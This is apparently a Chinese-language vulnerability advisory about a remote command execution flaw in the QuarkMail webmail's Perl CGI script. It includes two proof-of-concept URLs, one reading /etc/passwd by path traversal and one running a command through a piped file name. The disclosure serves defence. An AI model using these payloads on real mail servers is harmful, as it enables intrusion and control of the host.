快客电邮(QuarkMail)远程命令执行漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。 QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。 登录进入系统之后访问如下URL http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&amp;fd=inbox&amp;p=1&amp;l=10&amp;max=2&amp;lang=gb&amp;tf=../../../../../../../etc/passwd%00&amp;id=2&amp;sort=0&amp;read_flag=yes 即可得到系统账户文件,访问如下URL http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&amp;fd=inbox&amp;p=1&amp;l=10&amp;max=2&amp;lang=gb&amp;tf=../../../../../../../usr/bin/id|%00&amp;id=2&amp;sort=0&amp;read_flag=yes 即可以将/usr/bin/id文件打开执行,并且将结果返回,用户就可以利用一序列操作获得系统的完整访问权。 QuarkMail 请等待官方补丁。 <a href=http://www.ipmotor.com/ target=_blank>http://www.ipmotor.com/</a>

0%
暂无可用Exp或PoC
当前有0条受影响产品信息